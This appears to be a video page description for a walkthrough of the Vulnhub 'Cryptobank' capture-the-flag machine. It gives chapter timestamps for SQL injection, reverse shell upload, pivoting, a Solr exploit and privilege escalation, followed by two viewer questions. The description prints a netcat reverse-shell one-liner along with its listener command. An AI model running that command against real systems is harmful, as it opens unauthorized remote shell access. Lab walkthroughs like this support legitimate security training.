Cryptobank CTF - Vulnhub | by MuddSec

preview_player
Показать описание


###################################################
netcat one liner:
nc -e /bin/sh ip port ----- victim machine
nc -lvnp port ---- attacker machine
#######################################################

Important Timestamps:
Nmap scan - 1:11
SQL injection - 5:47
insecure source code management - 28:07
PHP code review - 34:46
uploading reverse shell on command execution portal - 37:45
pivoting and port forward explanation - 56:07
pivoting and port forward practical - 58:30
exploiting Solr 8.1.1 - 1:02:06
privilege escalation - 1:10:48

Thanks for Watching!
Рекомендации по теме
Комментарии
Автор

can we get another way to crack the box? and I have a doubt is it necessary to use a meterpreter session instead of php reverse shell?? thanks for the walkthrough :-)

pranav_agr
Автор

i have a problem which do not know some Network knowledge,for example 172.17.0.0/255.255.255.0 what is the meaning? Could you give me some E-learning materials? thank you very much

days